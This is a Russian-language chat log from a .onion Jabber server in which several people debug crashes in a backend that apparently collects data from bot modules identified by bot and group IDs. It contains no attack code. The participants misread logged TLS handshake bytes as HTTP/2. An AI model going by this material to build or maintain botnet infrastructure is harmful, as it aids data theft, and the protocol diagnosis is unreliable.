Timestamp	From	To	Message
2021-08-27 10:23:54.836176	ttrr	defender	тута
2021-08-27 10:24:08.860095	defender	ttrr	ждем остальных
2021-08-27 10:24:08.862831	ttrr	defender	ждем остальных
2021-08-27 10:24:39.448525	ttrr	defender	ок
2021-08-27 10:26:04.832095	ttrr	defender	хай
2021-08-27 10:26:17.237221	ttrr	defender	я пароль не ставил на вход в конфу, это приемлемо?
2021-08-27 10:27:43.436076	defender	ttrr	это только для зарегистрированных участников
2021-08-27 10:27:43.437167	ttrr	defender	это только для зарегистрированных участников
2021-08-27 10:27:48.739755	defender	ttrr	других тут не может быть
2021-08-27 10:27:48.740596	ttrr	defender	других тут не может быть
2021-08-27 10:28:03.701637	defender	ttrr	хоф остался
2021-08-27 10:28:03.703264	ttrr	defender	хоф остался
2021-08-27 10:28:46.325657	ttrr	defender	defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
2021-08-27 10:29:26.309128	ttrr	defender	тута
2021-08-27 10:29:26.310436	ttrr	defender	ждем остальных
2021-08-27 10:29:26.311506	ttrr	defender	ок
2021-08-27 10:29:26.312274	ttrr	defender	хай
2021-08-27 10:29:26.313360	ttrr	defender	я пароль не ставил на вход в конфу, это приемлемо?
2021-08-27 10:29:26.314409	ttrr	defender	это только для зарегистрированных участников
2021-08-27 10:29:26.315033	ttrr	defender	других тут не может быть
2021-08-27 10:29:26.316260	ttrr	defender	хоф остался
2021-08-27 10:29:40.192155	ttrr	defender	defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
2021-08-27 10:30:23.084784	ttrr	defender	на месте
2021-08-27 10:30:28.883058	ttrr	defender	привет
2021-08-27 10:34:32.661666	ttrr	defender	короче . проблема в хттп в том . что клиент обрывает коннект раньше, чем передает данные . а именно я грешу на то, что клиент не передает самый последний перевод строки
2021-08-27 10:35:13.159964	ttrr	defender	от этого возникает краш на моей стороне и я не могу обработать запрос
2021-08-27 10:35:33.427548	ttrr	defender	в http есть три способа получить флаг конца передачи
2021-08-27 10:35:41.725856	ttrr	defender	1. Content-Length
2021-08-27 10:35:47.130499	ttrr	defender	2. Connection: close
2021-08-27 10:36:04.114041	ttrr	defender	3. Content-Encoding: chunked и дальше отслеживается цепочка чанков
2021-08-27 10:36:15.504833	ttrr	defender	клиент о котором ты говоришь какой метод использует?
2021-08-27 10:36:21.263922	ttrr	defender	ты сам какой метод форсируешь на сервере?
2021-08-27 10:36:59.318521	ttrr	defender	defender добавь сюда flip и steller
2021-08-27 10:37:09.756334	ttrr	defender	да  я никакой не форсирую .есть либа . которая занимается хтпп .. она парсит и разбирает всё .. я лишь её вызываю . 
причем сделано это так .. что сначала работает она .. а потом уже я .. т.о. я не имею доступа напрямую к бинарному потоку данных
2021-08-27 10:37:22.168532	ttrr	defender	так вот разберись
2021-08-27 10:37:36.835609	ttrr	defender	у клиентов есть причина использовать наиболее простой метод
2021-08-27 10:37:55.060324	ttrr	defender	причина есть .если эта причина удовлетворяет спеицификациям хттп ..
2021-08-27 10:37:55.376350	ttrr	defender	например им сложно использовать chunked-передачу
2021-08-27 10:38:34.865263	ttrr	defender	и они скорее всего используют connection: close, то есть сигнал о конце передачи приходит с закрытием сокета
2021-08-27 10:38:38.660530	ttrr	defender	если либа падает - это значит что клиент отправляет не то что ожидает эта либа . т.е. не хттп
2021-08-27 10:39:02.448168	ttrr	defender	ты должен дать требования тем кто пишет клиенты, что эта либа умеет, а чего не умеет
2021-08-27 10:39:06.112144	ttrr	defender	либа ожидает на входе (бинарном) данные, но бинарный вход пуст .. вот парсер хттп и ломается
2021-08-27 10:39:17.549803	ttrr	defender	она умеет всё
2021-08-27 10:39:26.513704	ttrr	defender	как видим не всё
2021-08-27 10:39:29.431661	ttrr	defender	это промышленное решение .. и её пользуются очень многие
2021-08-27 10:39:40.115299	ttrr	defender	давай на примерах
2021-08-27 10:39:46.363942	ttrr	defender	примерах что ?
2021-08-27 10:39:51.188584	ttrr	defender	кривой посылки
2021-08-27 10:40:03.664725	ttrr	defender	выложи сюда кривую посылку со стороны модуля и скажи что в ней криво
2021-08-27 10:40:15.077360	ttrr	defender	еще раз . у меня нет доступа к бинарному потоку ..
2021-08-27 10:40:19.330216	ttrr	defender	либа от меня это скрывает
2021-08-27 10:40:31.498218	ttrr	defender	ну HTTP-запрос ты же можешь перехватить?
2021-08-27 10:40:39.254660	ttrr	defender	я лишь могу по ошибке сказать где сломалось у неё и я вижу что она ожидает данные - но данных нет
2021-08-27 10:40:52.887542	ttrr	defender	то есть ты даже не видишь сырые HTTP
2021-08-27 10:40:58.708640	ttrr	defender	нет
2021-08-27 10:41:03.475858	ttrr	defender	только через прокси какой могу
2021-08-27 10:41:07.273282	ttrr	defender	поставь mitmproxy
2021-08-27 10:41:18.240197	ttrr	defender	как можно отлаживать такую сложную систему наощупь?
2021-08-27 10:41:18.449586	ttrr	defender	ну или логи сделать внутри либы
2021-08-27 10:41:22.815803	ttrr	defender	это уже по живому надо
2021-08-27 10:41:51.572102	ttrr	defender	и флип и стеллер могут предъявить запросы HTTP которые они генерируют, и могут попытаться их исправить в соответствии с твоими указаниями
2021-08-27 10:42:05.074755	ttrr	defender	в общем давай я посмотрю тогда бинарный поток . лог сделаю на живом сервере ..
2021-08-27 10:42:05.582978	ttrr	defender	тебе лишь надо сказать где ошибка, по твоей версии
2021-08-27 10:42:08.863047	ttrr	defender	может убрать либу? получать данные с сокета?
2021-08-27 10:42:10.026029	ttrr	defender	они тоже могут дать пример потока
2021-08-27 10:42:18.327826	ttrr	defender	парсить хттп сам будешь ?
2021-08-27 10:42:39.088171	ttrr	defender	@zulas так тут же важно именно сравнить то, что они отправляют, с тем, что ты принимаешь
2021-08-27 10:42:43.638223	ttrr	defender	мне щас надо на часок отлучится .. приду - сделаю - посмотрю
2021-08-27 10:42:44.194136	ttrr	defender	очень далеко не факт что это одно и то же
2021-08-27 10:42:44.437525	ttrr	defender	ну а какой выход?
2021-08-27 10:42:52.130379	ttrr	defender	уже не раз так было
2021-08-27 10:42:54.115412	ttrr	defender	выход - разбираться
2021-08-27 10:42:55.651006	ttrr	defender	по пути у нас прокладки
2021-08-27 10:42:59.528754	ttrr	defender	и наши, и чужие
2021-08-27 10:43:06.784530	ttrr	defender	они жонглируют заголовками
2021-08-27 10:43:16.180122	ttrr	defender	они имеют право перекодировать пакеты
2021-08-27 10:43:18.435811	ttrr	defender	отошел
2021-08-27 12:29:10.137079	ttrr	defender	я на живом сейчас экспериментирую
2021-08-27 12:49:43.335545	ttrr	defender	2021-08-27 15:43:18.250 [info] <0.173.0> Data: <<22,3,1,0,122,1,0,0,118,3,1,97,40,221,230,188,215,55,88,76,161,53,70,161,100,228,44,187,170,189,227,118,111,91,127,244,240,143,161,47,114,14,107,0,0,14,192,10,192,9,192,20,192,19,0,53,0,47,0,10,1,0,0,63,0,0,0,28,0,26,0,0,23,116,114,97,99,107,46,97,110,97,108,121,116,105,99,115,45,100,97,116,97,46,105,111,0,10,0,8,0,6,0,29,0,23,0,24,0,11,0,2,1,0,0,35,0,0,0,23,0,0,255,1,0,1,0>> 
2021-08-27 15:43:18.251 [error] emulator Error in process <0.173.0> on node dero_server@server with exit value:
2021-08-27 15:43:18.251 [error] <0.173.0>@cowboy_protocol:parse_method:169 Ranch listener http terminated with reason: no function clause matching cowboy_protocol:parse_method(<<>>, {state,#Port<0.4001>,ranch_tcp,[cowboy_router,cowboy_handler],false,[{listener,http},{dispatch,[...]}],...}, <<22,3,1,0,122,1,0,0,118,3,1,97,40,221,230,188,215,55,88,76,161,53,70,161,100,228,44,187,170,189,...>>) line 169

вот из лога бинарный поток
2021-08-27 12:49:51.523911	ttrr	defender	который вызывает проблему
2021-08-27 12:50:38.326893	ttrr	defender	а вот это:

2021-08-27 15:43:18.007 [info] <0.158.0> Data: <<22,3,1,2,0,1,0,1,252,3,3,85,217,147,101,152,84,237,168,57,127,64,130,166,246,5,28,145,200,82,174,223,48,129,23,230,170,167,24,30,118,147,105,32,112,120,62,28,164,221,67,133,188,32,79,97,132,30,48,15,140,239,224,165,168,5,1,6,12,28,143,159,175,32,133,143,0,54,218,218,19,1,19,2,19,3,192,44,192,43,204,169,192,48,192,47,204,168,192,36,192,35,192,10,192,9,192,40,192,39,192,20,192,19,0,157,0,156,0,61,0,60,0,53,0,47,192,8,192,18,0,10,1,0,1,125,234,234,0,0,0,0,0,23,0,21,0,0,18,103,97,116,101,119,97,121,46,105,99,108,111,117,100,46,99,111,109,0,23,0,0,255,1,0,1,0,0,10,0,12,0,10,202,202,0,29,0,23,0,24,0,25,0,11,0,2,1,0,0,16,0,14,0,12,2,104,50,8,104,116,116,112,47,49,46,49,0,5,0,5,1,0,0,0,0,0,13,0,24,0,22,4,3,8,4,4,1,5,3,2,3,8,5,8,5,5,1,8,6,6,1,2,1,0,18,0,0,0,51,0,43,0,41,202,202,0,1,0,0,29,0,32,233,161,223,78,0,73,53,96,119,159,215,212,71,216,72,236,103,226,140,165,145,139,122,217,41,240,23,248,115,130,152,66,0,45,0,2,1,1,0,43,0,11,10,154,154,3,4,3,3,3,2,3,1,250,250,0,1,0,0,21,0,183,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,...>>
 State: {state,#Port<0.3896>,ranch_tcp,[cowboy_router,cowboy_handler],false,[{listener,http},{dispatch,[{'_',[],[{['...'],[],http_handler,[{limits,32768,1024,4096,102400,8529920,8388608,1024}]}]}]}],undefined,undefined,5,1,100,4096,64,4096,100,5000,1630068203006}
 ReqEmpty 0

проблемы не вызывает
2021-08-27 12:51:26.601977	ttrr	defender	или вот это:


2021-08-27 15:43:18.064 [info] <0.162.0> Data: <<22,3,1,2,0,1,0,1,252,3,3,14,44,33,56,26,185,206,231,236,178,193,16,165,188,27,22,214,160,174,190,146,134,183,85,117,16,235,49,77,234,9,129,32,12,245,86,126,154,166,11,108,160,171,200,195,227,185,95,124,147,27,250,187,108,120,82,136,198,154,167,107,53,75,254,175,0,32,250,250,19,3,19,1,19,2,204,169,204,168,192,43,192,47,192,44,192,48,192,19,192,20,0,156,0,157,0,47,0,53,1,0,1,147,138,138,0,0,0,0,0,20,0,18,0,0,15,109,97,105,108,46,103,111,111,103,108,101,46,99,111,109,0,23,0,0,255,1,0,1,0,0,10,0,10,0,8,202,202,0,29,0,23,0,24,0,11,0,2,1,0,0,35,0,0,0,16,0,14,0,12,2,104,50,8,104,116,116,112,47,49,46,49,0,5,0,5,1,0,0,0,0,0,13,0,18,0,16,4,3,8,4,4,1,5,3,8,5,5,1,8,6,6,1,0,18,0,0,0,51,0,43,0,41,202,202,0,1,0,0,29,0,32,18,248,125,69,188,229,9,34,184,87,206,13,209,25,177,114,240,187,218,2,250,42,123,238,190,210,236,200,51,78,3,30,0,45,0,2,1,1,0,43,0,11,10,42,42,3,4,3,3,3,2,3,1,0,27,0,3,2,0,2,68,105,0,5,0,3,2,104,50,170,170,0,1,0,0,21,0,196,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0>>
2021-08-27 12:54:00.999784	ttrr	defender	@defender если очень надо то я могу перехватывать такой краш - и не показывать его.
2021-08-27 12:55:03.824419	ttrr	defender	ничего не понятно
2021-08-27 12:55:15.834419	ttrr	defender	как это соотносится с HTTP-запросом? какая это его часть?
2021-08-27 12:55:54.279610	ttrr	defender	это после распаковки из контейнера multipart/form-data? или это данные вместе с контейнером?
2021-08-27 12:56:03.730621	ttrr	defender	или там вообще нет контейнера?
2021-08-27 12:57:49.426540	ttrr	defender	сними соответствующие HTTP-запросы, поставь прокси перед сервером
2021-08-27 13:02:26.806937	ttrr	defender	это самое начало
2021-08-27 13:02:41.481437	ttrr	defender	вот как идет поток .. вот так и логирует
2021-08-27 13:03:07.916328	ttrr	defender	тебе в текстовом виде ? так там миллион управляющих символов каких-то
2021-08-27 13:03:14.345891	ttrr	defender	где то в середине http/1.1
2021-08-27 13:03:17.205940	ttrr	defender	виднеется
2021-08-27 13:03:42.549146	ttrr	defender	можно файлом
2021-08-27 13:04:01.501144	ttrr	defender	ты можешь локализовать сбойный байт?
2021-08-27 13:04:01.818049	ttrr	defender	ок щас сделаю
2021-08-27 13:04:07.445592	ttrr	defender	даже хотя бы в этом потоке
2021-08-27 13:04:18.872657	ttrr	defender	сказать - байт номер такой-то приводит к вылету
2021-08-27 13:05:55.255286	ttrr	defender	он говорит что метода нет в хттп
2021-08-27 13:06:01.244955	ttrr	defender	cowboy_protocol:parse_method(<<>>
2021-08-27 13:06:06.853843	ttrr	defender	пустой - поток обрывается
2021-08-27 13:08:00.858677	ttrr	defender	наверно пришло время обновить либу .. а то она уже далеко вперед ушла
2021-08-27 13:09:11.123290	ttrr	defender	либа 6 летней давности
2021-08-27 13:09:39.656671	ttrr	defender	протокол не сильно менялся за эти 6 лет
2021-08-27 13:11:32.565984	ttrr	defender	я бы сказал не менялся )
2021-08-27 13:12:55.664397	ttrr	defender	куда файл закинуть ?
2021-08-27 13:16:15.449823	ttrr	defender	https://disk.yandex.ru/d/zIsWj8NjR53tGg
2021-08-27 13:16:18.194368	ttrr	defender	вот 2 файла
2021-08-27 13:17:30.254981	defender	ttrr	flip и steller отправил приглашения
2021-08-27 13:17:30.259202	ttrr	defender	flip и steller отправил приглашения
2021-08-27 13:18:23.928260	ttrr	defender	мне все равно пока ничего не ясно из файлов
2021-08-27 13:18:59.120232	ttrr	defender	по-прежнему неясно что это вообще такое - это значение поля Data? я не могу так гадать
2021-08-27 13:21:57.110895	ttrr	defender	это бинарный поток который мне приходит ..
2021-08-27 13:22:00.247259	ttrr	defender	вот с первого байта
2021-08-27 13:22:25.679374	defender	ttrr	давайте поставлю nginx между клиентом и деро
2021-08-27 13:22:25.680102	ttrr	defender	давайте поставлю nginx между клиентом и деро
2021-08-27 13:22:31.475508	ttrr	defender	поставь
2021-08-27 13:22:37.699623	defender	ttrr	и там может по логам что поймем
2021-08-27 13:22:37.700712	ttrr	defender	и там может по логам что поймем
2021-08-27 13:22:37.843365	ttrr	defender	и пусть логирует все запросы ..
2021-08-27 13:22:46.281848	defender	ttrr	ок сейчас
2021-08-27 13:22:46.283346	ttrr	defender	ок сейчас
2021-08-27 13:22:53.638295	ttrr	defender	запрос . тело . ответ
2021-08-27 13:23:09.180599	defender	ttrr	я сменю порт у деро, на 8082 будут нджинкс принимать
2021-08-27 13:23:09.181748	ttrr	defender	я сменю порт у деро, на 8082 будут нджинкс принимать
2021-08-27 13:24:01.558723	defender	ttrr	а, драйвера не добавил сюда
2021-08-27 13:24:01.561955	ttrr	defender	а, драйвера не добавил сюда
2021-08-27 13:24:08.080018	defender	ttrr	нужен он?
2021-08-27 13:24:08.081160	ttrr	defender	нужен он?
2021-08-27 13:24:55.921814	ttrr	defender	я хз . . я просто пишу сюда что вижу у себя .. а кто нужен я хз
2021-08-27 13:25:13.261384	ttrr	defender	вот кто это генерит - тот и нужен ..
2021-08-27 13:28:48.362135	ttrr	defender	нам нужен прилетевший сырой HTTP-запрос как есть
2021-08-27 13:28:57.837676	ttrr	defender	и нужно указание - что в нем криво
2021-08-27 13:34:50.153327	ttrr	defender	[16:24:01] <defender> а, драйвера не добавил сюда
обязательно нужен
2021-08-27 13:39:46.751134	ttrr	defender	> нам нужен прилетевший сырой HTTP-запрос как есть
я уже показал что мне прилетает .. вот это сырые данные
2021-08-27 13:40:50.330075	ttrr	defender	подождем что дефендер скажет
2021-08-27 13:49:10.567103	ttrr	defender	дело в том, что данные в dero посылает не один модуль
2021-08-27 13:49:18.704093	ttrr	defender	их много
2021-08-27 13:49:49.131892	ttrr	defender	мы тут с зуласом разбираемся, там странно всё
2021-08-27 13:50:18.925809	ttrr	defender	нужно дорабатывать сущесутвующую, использовать другую либу, но чтобы ничего не падало
2021-08-27 13:53:32.720403	ttrr	defender	и расчитывать на то, что данные будут невалидные
2021-08-27 13:54:01.212062	ttrr	defender	их могут специально посылать
2021-08-27 13:58:05.090629	ttrr	defender	ну я либу могу модифицировать . просто чтобы если экзепшн в какой-то области .. то в лог не падало и даже ответ можно слать я думаю
2021-08-27 13:58:24.129330	ttrr	defender	зулас говорит, что вот эти данные на яндекс диске - это и есть HTTP-запросы со всеми заголовками
2021-08-27 13:58:26.262568	ttrr	defender	точнее без них
2021-08-27 13:58:29.820643	ttrr	defender	а там бинарный поток
2021-08-27 13:58:48.997612	ttrr	defender	и если он хоть как-то парсится либой бэкенда, то это получается HTTP/2
2021-08-27 13:59:02.545630	ttrr	defender	и тогда возникает вопрос
- откуда у нас вообще HTTP/2?
2021-08-27 13:59:21.605171	ttrr	defender	ну или QUIC или еще какая бинарная гугловская фигня
2021-08-27 13:59:40.081867	ttrr	defender	defender: на прокладках случайно не включена конверсия в HTTP/2 ?
2021-08-27 14:04:43.777776	defender	ttrr	нет
2021-08-27 14:04:43.781555	ttrr	defender	нет
2021-08-27 14:04:57.487562	defender	ttrr	прокладки - роутеры, что приняли то и передали
2021-08-27 14:04:57.490592	ttrr	defender	прокладки - роутеры, что приняли то и передали
2021-08-27 14:07:15.102362	ttrr	defender	отлучился
2021-08-27 14:09:00.007991	ttrr	defender	defender: еще больше нужны сырые http-запросы теперь, в свете данных зуласа
2021-08-27 14:09:10.161578	ttrr	defender	если подтвердится что там не HTTP/1.1 то это очень интересно
2021-08-27 14:09:16.333361	ttrr	defender	нужно подтверждение от тебя
2021-08-27 14:13:25.740431	defender	ttrr	я делаю нджинкс
2021-08-27 14:13:25.744339	ttrr	defender	я делаю нджинкс
2021-08-27 14:15:45.064081	ttrr	defender	кстати zulas: ты можешь "хороший" запрос проследить до базы?
2021-08-27 14:15:51.254888	ttrr	defender	вот тот бинарный
2021-08-27 14:53:54.440158	ttrr	defender	что значит послать до базы ?
2021-08-27 14:53:58.872672	ttrr	defender	@buza
2021-08-27 14:54:32.240124	ttrr	defender	не послать, а проследить
2021-08-27 14:54:40.783813	ttrr	defender	вот тебе пришел этот бинарный запрос
2021-08-27 14:54:51.037887	ttrr	defender	и ты говоришь что первый из них нормально парсится и отрабатывает
2021-08-27 14:55:04.012285	ttrr	defender	раз так, он должен положить в базу данных новую запись
2021-08-27 14:55:10.354057	ttrr	defender	эту запись можно увидеть?
2021-08-27 14:55:14.254929	ttrr	defender	там больше нет ничего ..
2021-08-27 14:55:22.132717	ttrr	defender	ну т.е. до базы оно не доходит
2021-08-27 14:55:28.795988	ttrr	defender	ни первый ни второй?
2021-08-27 14:55:31.161839	ttrr	defender	просто в логи ничего не пишется
2021-08-27 14:55:37.826701	ttrr	defender	да
2021-08-27 14:55:50.742802	ttrr	defender	ну так может это и не мы?
2021-08-27 14:55:50.932836	ttrr	defender	может это боты поисковые и т.п ?
2021-08-27 14:56:35.198744	ttrr	defender	defender: ты можешь на прокладках отрезать все что не HTTP/1.1 ?
2021-08-27 14:56:48.978670	ttrr	defender	все HTTP/2 QUIC и прочий модный кал
2021-08-27 14:57:01.398854	ttrr	defender	и запретить доступ к веб-серверу не с прокладки
2021-08-27 15:28:09.447955	defender	ttrr	нет не могу
2021-08-27 15:28:09.450800	ttrr	defender	нет не могу
2021-08-27 15:28:22.260957	defender	ttrr	говорю же там все как есть передает
2021-08-27 15:28:22.262595	ttrr	defender	говорю же там все как есть передает
2021-08-27 16:18:03.233020	defender	ttrr	сделал через нджинкс
2021-08-27 16:18:03.240793	ttrr	defender	сделал через нджинкс
2021-08-27 16:18:09.346196	defender	ttrr	но пока логирование обычное
2021-08-27 16:18:09.347314	ttrr	defender	но пока логирование обычное
2021-08-27 16:18:28.783542	defender	ttrr	углубленное позже сделаю
2021-08-27 16:18:28.784797	ttrr	defender	углубленное позже сделаю
2021-08-30 06:48:14.631226	ttrr	defender	@defender -- так всё вопрос закрыт ?
2021-08-30 08:19:29.155750	ttrr	defender	defender: а почему не могу?
https://stackoverflow.com/questions/39453027/how-to-disable-http2-in-nginx
я вот так имею в виду - тут пишут что "могу"
2021-08-30 08:43:21.004389	ttrr	defender	zulas: есть сомнение что те дампы крешей что ты привел - что это были посылки модулей трика
2021-08-30 08:44:15.468860	ttrr	defender	ну вообще не были . они были отброшены т.к. не распаршены . ну и очевидно что хттп2 .а не хттп1
2021-08-30 08:44:17.032729	ttrr	defender	нужно воспроизвести краш именно на модуле трика, так чтобы втроем с драйвером и кодером модуля разобраться с тем что же именно криво
2021-08-30 08:44:38.452457	ttrr	defender	для начала давайте отфильтруем внешние запросы .
2021-08-30 08:44:47.715819	ttrr	defender	я думаю проблема сама собой решится .
2021-08-30 08:45:02.141509	ttrr	defender	потому что не может один и тот же модуль\код выдавать 2 разных протокола .
2021-08-30 08:45:02.583443	ttrr	defender	zulas: поясни мне проблему с крешем
2021-08-30 08:45:07.250818	ttrr	defender	почему это проблема?
2021-08-30 08:45:17.028383	ttrr	defender	потому что сервис падает и передача данных кончается?
2021-08-30 08:45:18.247973	ttrr	defender	я хз почему это проблема .. это к дефу
2021-08-30 08:45:29.888588	ttrr	defender	потому что в логи краши срет .. и всё
2021-08-30 08:45:37.390706	ttrr	defender	сервис остается жив?
2021-08-30 08:45:40.578338	ttrr	defender	слушает дальше?
2021-08-30 08:45:41.779297	ttrr	defender	конечно
2021-08-30 08:45:46.969645	ttrr	defender	твою бать
2021-08-30 08:45:52.600530	ttrr	defender	тогда хули мы тут обсуждаем?
2021-08-30 08:46:00.270855	ttrr	defender	я хз . я это сразу говорил
2021-08-30 08:46:23.872957	ttrr	defender	Краш означает что пришло нечто и оно не попало в базу.
2021-08-30 08:46:41.499030	ttrr	defender	Т.к. не распозналось либой эрланга, верно?
2021-08-30 08:47:00.263056	ttrr	defender	нечто - это что угодно, собственно я и сказал что это что угодно, а нормальный POST оно распознает . и обработвает
2021-08-30 08:47:01.979538	ttrr	defender	значит мы обсуждаем потерю данных, но мы потеряли день, потому что в качестве примеров были приведены http2-запросы каких-то левых ботов
2021-08-30 08:47:43.835662	ttrr	defender	[11:44:17] <buza> нужно воспроизвести краш именно на модуле трика, так чтобы втроем с драйвером и кодером модуля разобраться с тем что же именно криво\
2021-08-30 08:47:53.820536	ttrr	defender	сосредоточтесь на этом
2021-08-30 08:48:14.365972	ttrr	defender	zulas: найди в логах креш именно от данных модуля, чтобы там был HTTP/1.1
2021-08-30 08:48:24.784725	ttrr	defender	и давайте разбирать нормальный пример
2021-08-30 08:48:31.337947	ttrr	defender	значит для начала нужно обеспечить условия, чтобы только модуль трика мог ко мне данные передавать . иначе мы говорим о любом боте который шлет любое говно
2021-08-30 08:49:09.766393	ttrr	defender	деф что-то отрежет, но не думаю что всё
2021-08-30 08:49:25.628100	ttrr	defender	по хттп1 тебе все равно будут лезть левые спайдеры
2021-08-30 08:51:43.324141	ttrr	defender	Есть вариант передать любым способом ключ в бота, и сделать на эрланге проверку, что ключ в запросе совпадает с ключем в базе
2021-08-30 08:52:06.213552	ttrr	defender	чтобы что?
2021-08-30 08:52:29.669862	ttrr	defender	отсечь все данные которые не относятся к трику.
2021-08-30 08:52:52.947880	ttrr	defender	вообще-то у бэка есть штатный механизм для этого
2021-08-30 08:53:08.920700	ttrr	defender	он парсит запрос и вытаскивает ID бота из него
2021-08-30 08:53:35.692466	ttrr	defender	это и есть ключ, 90% запросов отсечется по невалидному URI с отсутствующим ид бота и группы
2021-08-30 08:53:48.794475	ttrr	defender	остальные 9% левых запросов отсечется по неправдоподобному ИД бота
2021-08-30 08:53:54.542484	ttrr	defender	но можно и падать
2021-08-30 08:56:42.266440	ttrr	defender	падает потому что ему протокол непонятен - он ожидает одно, а нихера не приходит .
2021-08-30 08:57:05.200728	ttrr	defender	когда протокол понятен - то и соответствущя реакция на него независимо правильный он ( от нас) или не правильны (от чужих)
2021-08-30 08:57:35.264247	ttrr	defender	вот когда отсечет .. тогда можно говорить о чем . а если падает только на левых ..
2021-08-30 09:00:25.677237	ttrr	defender	еще раз, какую проблему мы решаем?
2021-08-30 09:03:21.874652	ttrr	defender	то что бэк падает на левых данных это не проблема. Он что-то не может распарсить, ну и ладно
2021-08-30 09:03:46.740987	ttrr	defender	я пока вижу левые данные только
2021-08-30 09:03:53.975851	ttrr	defender	driver: ?
2021-08-30 09:10:20.685161	ttrr	defender	Вообще про краши говорил дэф.
2021-08-30 09:10:34.434680	ttrr	defender	Я думаю что нам надо закрыть логи
2021-08-30 09:11:15.487643	ttrr	defender	Чтобы можно было понять что приходит на бэк. Чтобы если краши появляются можно было понять что именно причина
2021-08-30 09:11:29.532138	ttrr	defender	У нас есть поток тестовых данных которые всегда ошибки вызывают.
2021-08-30 09:13:13.917392	ttrr	defender	Например я часто вычищаю из базы какие то записи которые явно не в тему. Их там 6 штук по кукам, но они все время появляются и дальше никогда не проходят
2021-08-30 09:14:09.942008	ttrr	defender	То что сейчас сделали с нджинксом - задачу решает пока что.
Надо только более полные логи настроить
2021-08-30 09:14:23.957903	ttrr	defender	Чтобы тело пост запросов можно было видеть.
2021-08-30 09:16:17.561310	ttrr	defender	ну то есть ты говоришь о том, что нужно логирование запросов, а его нету. Верно?
2021-08-30 09:21:45.711674	ttrr	defender	Да
2021-08-30 09:21:52.695193	ttrr	defender	Сейчас это главное.
2021-08-30 09:24:33.033068	ttrr	defender	Вся история про эту конфу была с сообщения что нужно менять либу парсинга чтобы логи сделать, о чем нам зулас сообщил, но дэф придумал просто поставить проксю нджинкс. Так что я честно не очень понимаю, каких то правок пока нет больше в бэке.
Но есть проблема, что часть данных не приходит и вот нужно понять почему и тогда дальше думать.
2021-08-30 09:26:50.169628	ttrr	defender	логи сделаны .. я приводил выдержки оттуда
2021-08-30 09:27:47.882728	ttrr	defender	для меня непонятно кто это генерит .. но факт в том что либа не может понять что это ... поэтому краши .. 
хттп1 она обрабатыват .. хттп2 у нас нет .. соотвественно давайте хттп2 просто закроем и всё
2021-08-30 09:27:59.129723	ttrr	defender	тогда мы сузим круг возможных проблем и найдем решение для них
2021-08-30 09:28:46.216278	ttrr	defender	краши по факту могут быть всегда -- всмысли когда какой-то левый протокол на порт коннектится .. то может быть краш в лог . это не значит что сервис в дауне . это просто значит что один именно этот запрос не вызвал нужной реакции сервера
2021-08-30 09:36:07.626417	ttrr	defender	> соотвественно давайте хттп2 просто закроем и всё 
точнее закроем все что не хттп1
2021-08-30 09:36:26.647234	ttrr	defender	я не думаю что у Nginx проблемы могут быть с такой логикой .. правильно ?
2021-08-30 09:43:57.351558	defender	ttrr	всем привет
2021-08-30 09:43:57.354587	ttrr	defender	всем привет
2021-08-30 09:44:05.515608	defender	ttrr	вот для этого я и делал нджинк
2021-08-30 09:44:05.517492	ttrr	defender	вот для этого я и делал нджинк
2021-08-30 09:44:20.135624	defender	ttrr	но он как драйвер сказал не правильно проксировал
2021-08-30 09:44:20.137028	ttrr	defender	но он как драйвер сказал не правильно проксировал
2021-08-30 09:44:24.798175	defender	ttrr	сейчас я с этим разберусь
2021-08-30 09:44:24.799542	ttrr	defender	сейчас я с этим разберусь
2021-08-30 09:44:34.733816	defender	ttrr	+ сделаю только хттп1
2021-08-30 09:44:34.736161	ttrr	defender	+ сделаю только хттп1
2021-08-30 09:44:44.412265	ttrr	defender	+ логирование запросов и тела
2021-08-30 09:44:44.412572	defender	ttrr	+ логирование запросов и тела
2021-08-30 13:22:35.595018	defender	ttrr	сделал логирование
2021-08-30 13:22:35.598973	ttrr	defender	сделал логирование
2021-08-30 13:22:38.300807	defender	ttrr	/var/log/nginx/access.log
2021-08-30 13:22:38.302158	ttrr	defender	/var/log/nginx/access.log
2021-08-30 13:22:59.685575	defender	ttrr	все выводит что проходит через нджинкс
2021-08-30 13:22:59.689214	ttrr	defender	все выводит что проходит через нджинкс
2021-08-30 13:23:34.883851	defender	ttrr	выпилить хттп2 не так просто, надо собирать свой дистр
2021-08-30 13:23:34.902497	ttrr	defender	выпилить хттп2 не так просто, надо собирать свой дистр
2021-08-30 13:23:45.773037	defender	ttrr	давайте начнем пока с ищучения лога
2021-08-30 13:23:45.775229	ttrr	defender	давайте начнем пока с ищучения лога
2021-08-30 13:24:22.984035	defender	ttrr	если деро крашится значит нджинкс примет код не 200 и по нему можно увидеть какие там данные
2021-08-30 13:24:22.987302	ttrr	defender	если деро крашится значит нджинкс примет код не 200 и по нему можно увидеть какие там данные
